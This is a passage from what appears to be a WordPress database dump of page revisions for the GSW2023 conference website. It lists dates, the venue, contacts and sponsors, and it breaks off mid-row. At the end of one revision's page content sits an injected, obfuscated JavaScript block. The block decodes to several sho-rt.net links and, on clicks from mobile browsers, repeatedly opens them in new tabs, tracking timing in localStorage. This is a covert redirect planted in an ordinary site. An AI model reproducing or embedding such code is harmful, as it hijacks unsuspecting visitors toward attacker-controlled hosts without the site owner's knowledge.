style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:49:14','2023-06-14 10:49:14','',3066,'https://gsw2023.com/?p=4699',0,'revision','',0),
(4700,1,'2023-06-14 10:49:51','2023-06-14 10:49:51','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" 